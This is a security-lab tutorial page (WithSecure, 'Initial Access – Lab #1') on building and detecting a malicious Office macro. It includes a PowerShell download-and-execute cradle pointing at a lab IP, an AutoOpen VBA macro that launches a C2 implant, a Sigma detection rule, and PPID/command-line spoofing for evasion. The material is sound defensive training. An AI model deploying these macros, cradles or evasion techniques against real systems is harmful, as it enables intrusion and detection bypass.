{"id":10591,"date":"2020-06-24T09:00:00","date_gmt":"2020-06-24T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/"},"modified":"2026-05-25T10:34:39","modified_gmt":"2026-05-25T09:34:39","slug":"attack-detection-fundamentals-initial-access-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/","title":{"rendered":"Attack Detection Fundamentals: Initial Access &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Initial Access &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Network Security                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                24 6\u6708, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    \u30b7\u30a7\u30a2\u3059\u308b                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_dbd04a0894bf6dac9d94cbfbaf2096fe\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                \u30b3\u30f3\u30c6\u30f3\u30c4\u30ca\u30d3\u30b2\u30fc\u30b7\u30e7\u30f3            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    \u30bb\u30af\u30b7\u30e7\u30f3\u3092\u9078\u629e                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering Initial Access, we explored a number of offensive techniques for obtaining a foothold within a target environment through the creation and successful delivery of malicious documents (also known as maldocs).<\/p>\n<p>We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides a step-by-step guide to recreating the demos from that Initial Access workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/DDK_hC90kR8\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the first lab of this series, we are going to build and analyse a malicious Excel\/Word macro that uses PowerShell to establish a C2 channel. The aim of this simulation will be to highlight the importance of the parent-child process analysis.<\/p>\n<p>Parent-child analysis is a general concept, whereby an analyst seeks anomalies within process creation events. In this case, we are going to craft a basic Excel macro that is used to spawn PowerShell.<\/p>\n<p>The reader will have the opportunity to analyse the traces left within Sysmon logs. We will finish the exercise with a small proof-of-concept of one of the many techniques that can be used to evade this type of detection. Considering that this is the first lab, a more comprehensive walkthrough will be provided that will include part of the analysis.<\/p>\n<p>DISCLAMER: Set up of the tools and the testing environment might not be covered comprehensively within this lab. We will assume basic familiarity with Linux\/Windows command line and the ability of the reader to deploy the necessary frameworks. For that, it is recommended to follow the suggested references for the official tutorials and walkthrough published by the framework&#x27;s author.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Windows VM<\/li>\n<li>Microsoft Office<\/li>\n<li><a href=\"https:\/\/github.com\/cobbr\/Covenant\" target=\"_blank\" rel=\"noopener\">Covenant<\/a><\/li>\n<\/ul>\n<ul>\n<li>AV + Host Firewall turned OFF<\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Listener Setup<\/h3>\n<p>Create a listener with a framework of your choice, we will use Covenant, but any framework that supports PowerShell launchers will work.<\/p>\n<p>On the &quot;Listeners&quot; tab, click &quot;Create&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/63a3e6bb880d8cd79e01651387a6397e3-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Configure the &quot;ConnectPort&quot; and &quot;ConnectAddress&quot; parameters with the IP address of your Covenant instance and the port where the implant will connect to:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/5aa25397f236995ff165c39af1b913ef2-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Click on &quot;Create&quot; to start the listener.<\/p>\n<h3>2 &#8211; Payload Generation<\/h3>\n<p>We will use the default PowerShell Covenant implant without any modification. AV will need to be turned off as Covenant&#x27;s out-of-the-box signatures are well-known.<\/p>\n<p>Don&#x27;t worry if this doesn&#x27;t sound very realistic, the aim of this lab is just to demonstrate the initial access technique, in a later lab we will also cover common evasion techniques.<\/p>\n<p>Select &quot;Launchers&quot; and then &quot;PowerShell&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/936e0fe4246bc18c6b4665771671b4de3-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The default options will be enough for now, click on &quot;Generate&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/216854620549a58de75e18f0ab269388-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Below you will see a very long PowerShell command with a base64 string, that is the full Covenant .NET implant. This payload is stageless, meaning that the payload is self-contained and will not need to download any other component to be fully-operational. In some cases, this might be desired since the staging process often introduces operational risks that could result in being detected.<\/p>\n<p>However, in this case, we want out payload to be staged. To do so, we can click on &quot;Host&quot; and insert the path where our payload will be hosted:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/5a7f667971116557fb2c9ba1e897118c4-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Click on &quot;Host&quot; and go back to the &quot;Generate&quot; tab. You should see a new one-liner that makes use of the Invoke-Expression cmdlet (shortened to &quot;iex&quot;) to execute our hosted PowerShell script:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/5ad68b594f6a524899831c38df2c02d6-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The payload uses a common PowerShell download and execute cradle, that will fetch the remote content (using the URL you set before) and interpret it as a PowerShell command.The payload will be something similar to this:<\/p>\n<pre><code class=\"language-bash\">powershell -Sta -Nop -Window Hidden -Command &quot;iex (New-Object Net.WebClient).DownloadString(&#x27;http:\/\/192.168.0.9\/test.ps1&#x27;)&quot;<\/code><\/pre>\n<p>Or in encoded form:<\/p>\n<pre><code class=\"language-bash\">powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgA5AC8AZgBpAGcAYQAnACkA<\/code><\/pre>\n<p>To avoid any problems with escaping quotes, you can also use the encoded launcher.The final stage of our attack will be the creation of a Word document with a malicious VBA macro. The macro will execute when the document opens, subsequently triggering the whole staging process we just created.To enable macro editing, open Microsoft Word and right-click on the toolbar on top of the screen and select &quot;Customize the Ribbon&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/1d17f4044b999f40f8000b89a5093b86-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Check the &quot;Developer&quot; box as follows:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/4d936f03fbcdfe761abef0dc92f32970-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>A &quot;Developer&quot; tab should now be visible within the toolbar. Select &quot;Visual Basic&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/19a95865ad7b9d59febf6e0b32734055-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>This will open the Visual Basic editor where we will place or macro code. It is possible use the following code as a template:<\/p>\n<pre><code class=\"language-bash\">Sub AutoOpen()    \nCall Shell(&quot;powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgA5AC8AZgBpAGcAYQAnACkA&quot;)\nEnd Sub<\/code><\/pre>\n<p>Execute the macro with the green arrow button and you should see a new connection within Covenant.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/cd0c7222f042a593a7cea1acba0fee77-1-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>3 &#8211; Analysis with Sigma<\/h3>\n<p><a href=\"https:\/\/github.com\/Neo23x0\/sigma\/\" target=\"_blank\" rel=\"noopener\">Sigma<\/a> is a framework that enables the creation of vendor-neutral SIEM signatures. It supports multiple backends such as Splunk, ELK, QRadar and native PowerShell.We will use a basic Sigma rule to hunt within Sysmon event log and find anomalous processes being spawned by an Office process. The rule we will use is the following and can be found <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/process_creation\/win_office_shell.yml\" target=\"_blank\" rel=\"noopener\">here<\/a>:<\/p>\n<pre><code class=\"language-bash\">title: Microsoft Office Product Spawning Windows Shell\nid: 438025f9-5856-4663-83f7-52f878a70a50\nstatus: experimental\ndescription: Detects a Windows command line executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio.\nreferences:\n    - https:\/\/www.hybrid-analysis.com\/sample\/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100\n    - https:\/\/mgreen27.github.io\/posts\/2018\/04\/02\/DownloadCradle.html\ntags:\n    - attack.execution\n    - attack.defense_evasion\n    - attack.t1059\n    - attack.t1202\n    - car.2013-02-003\n    - car.2014-04-003\nauthor: Michael Haag, Florian Roth, Markus Neis\ndate: 2018\/04\/06\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage:\n            - &#x27;*\\WINWORD.EXE&#x27;\n            - &#x27;*\\EXCEL.EXE&#x27;\n            - &#x27;*\\POWERPNT.exe&#x27;\n            - &#x27;*\\MSPUB.exe&#x27;\n            - &#x27;*\\VISIO.exe&#x27;\n            - &#x27;*\\OUTLOOK.EXE&#x27;\n        Image:\n            - &#x27;*\\cmd.exe&#x27;\n            - &#x27;*\\powershell.exe&#x27;\n            - &#x27;*\\wscript.exe&#x27;\n            - &#x27;*\\cscript.exe&#x27;\n            - &#x27;*\\sh.exe&#x27;\n            - &#x27;*\\bash.exe&#x27;\n            - &#x27;*\\scrcons.exe&#x27;\n            - &#x27;*\\schtasks.exe&#x27;\n            - &#x27;*\\regsvr32.exe&#x27;\n            - &#x27;*\\hh.exe&#x27;\n            - &#x27;*\\wmic.exe&#x27; # https:\/\/app.any.run\/tasks\/c903e9c8-0350-440c-8688-3881b556b8e0\/\n            - &#x27;*\\mshta.exe&#x27;\n            - &#x27;*\\rundll32.exe&#x27;\n            - &#x27;*\\msiexec.exe&#x27;\n            - &#x27;*\\forfiles.exe&#x27;\n            - &#x27;*\\scriptrunner.exe&#x27;\n            - &#x27;*\\mftrace.exe&#x27;\n            - &#x27;*\\AppVLP.exe&#x27;\n            - &#x27;*\\svchost.exe&#x27; # https:\/\/www.vmray.com\/analyses\/2d2fa29185ad\/report\/overview.html\n    condition: selection\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - unknown\nlevel: high<\/code><\/pre>\n<p>In order to use Sigma, clone the GitHub repository and install the required dependencies. Since we don&#x27;t want to deploy a SIEM just to test this rule, we can use the PowerShell backend to generate a cmdlet that will go through the logs manually:<\/p>\n<pre><code class=\"language-bash\">.\/sigmac -t powershell ..\/rules\/windows\/process_creation\/win_office_shell.yml<\/code><\/pre>\n<pre><code class=\"language-kusto\">Get-WinEvent -LogName Microsoft-Windows-Sysmon\/Operational | where {($_.ID -eq &quot;1&quot; -and ($_.message -match &quot;ParentImage.*.*\\\\WINWORD.EXE&quot; -or $_.message -match &quot;ParentImage.*.*\\\\EXCEL.EXE&quot; -or $_.message -match &quot;ParentImage.*.*\\\\POWERPNT.exe&quot; -or $_.message -match &quot;ParentImage.*.*\\\\MSPUB.exe&quot; -or $_.message -match &quot;ParentImage.*.*\\\\VISIO.exe&quot; -or $_.message -match &quot;ParentImage.*.*\\\\OUTLOOK.EXE&quot;) -and ($_.message -match &quot;Image.*.*\\\\cmd.exe&quot; -or $_.message -match &quot;Image.*.*\\\\powershell.exe&quot; -or $_.message -match &quot;Image.*.*\\\\wscript.exe&quot; -or $_.message -match &quot;Image.*.*\\\\cscript.exe&quot; -or $_.message -match &quot;Image.*.*\\\\sh.exe&quot; -or $_.message -match &quot;Image.*.*\\\\bash.exe&quot; -or $_.message -match &quot;Image.*.*\\\\scrcons.exe&quot; -or $_.message -match &quot;Image.*.*\\\\schtasks.exe&quot; -or $_.message -match &quot;Image.*.*\\\\regsvr32.exe&quot; -or $_.message -match &quot;Image.*.*\\\\hh.exe&quot; -or $_.message -match &quot;Image.*.*\\\\wmic.exe&quot; -or $_.message -match &quot;Image.*.*\\\\mshta.exe&quot; -or $_.message -match &quot;Image.*.*\\\\rundll32.exe&quot; -or $_.message -match &quot;Image.*.*\\\\msiexec.exe&quot; -or $_.message -match &quot;Image.*.*\\\\forfiles.exe&quot; -or $_.message -match &quot;Image.*.*\\\\scriptrunner.exe&quot; -or $_.message -match &quot;Image.*.*\\\\mftrace.exe&quot; -or $_.message -match &quot;Image.*.*\\\\AppVLP.exe&quot; -or $_.message -match &quot;Image.*.*\\\\svchost.exe&quot;)) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message<\/code><\/pre>\n<p>If we execute the resulting PowerShell command on our compromised system, we should obtain something like this:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/15ef70abed5d58633f50cc8460997b8e3-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>4 &#8211; Parent PID and Command-line Argument Spoofing<\/h3>\n<p>Parent-child analysis is not a silver bullet for detecting macro-based abuses, the PPID Spoofing technique is just one of the many examples with which these detections can be avoided.In a nutshell, PPID Spoofing is a <a href=\"https:\/\/attack.mitre.org\/tactics\/TA0005\/\" target=\"_blank\" rel=\"noopener\">Defence Evasion<\/a> technique that allows the attacker to spawn a new process with a different parent.<\/p>\n<p>In this case, we will use an open-source macro template that implements PPID spoofing to decouple the execution of PowerShell from our Office document.We will use the code from the following <a href=\"https:\/\/github.com\/christophetd\/spoofing-office-macro\" target=\"_blank\" rel=\"noopener\">repository<\/a> as a base. Since our installation of Office is 32-bit, we will use macro.vba.The relevant line that needs to be changed is the one that specifies the PowerShell command to execute:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/562bc3e5f96da7c61213f958dd1fd5b10-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Another interesting technique implemented in the VBA code is Command-line Argument Spoofing. Which, at a high-level, allows us to mask the true command-line arguments of our spawned PowerShell process.<\/p>\n<p>NOTE: More technical details of these two evasion techniques can be found in a great <a href=\"https:\/\/youtu.be\/l8nkXCOYQC4\" target=\"_blank\" rel=\"noopener\">talk<\/a> by Will Burgess.<\/p>\n<p>Execute the new macro code and try launching again the Sigma rule search we previously used. You should only see the first attack we performed.Analyse the Sysmon event logs, you should find an entry similar to the following:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/b448b1cf2d8fb418949aae3bbf8ce4ca4-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Notice the &quot;CommandLine&quot; field in the event &#8211; although it looks harmless, it was our Covenant implant being launched!<\/p>\n<h2>Conclusion<\/h2>\n<p>In this first lab we covered how an attacker could use macro-based payloads to obtain an initial foothold in a targeted environment. Despite the simplicity of the showed technique, real-life actors often rely on similar mechanisms for their initial access strategies. The reader was taken through both the generation of the malicious document and the first steps of the triage process from an host events perspective.<\/p>\n<p>Where applicable, bypasses were provided for the shown detections. This was done not to empower attackers, but rather to inform defenders that there is no such thing as an infallible technique and that the process of building a robust detection is a continuous process.<\/p>\n<p>The main takeaways from this first lab are:<\/p>\n<ul>\n<li>The importance of proper logging in place to monitor process creation events.<\/li>\n<li>The parent-child process analysis, that would help identifying anomalous behaviours. Although only the Office example is presented, this general model is applicable to many other scenarios.<\/li>\n<\/ul>\n<p>The next lab of this workshop can be found <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, 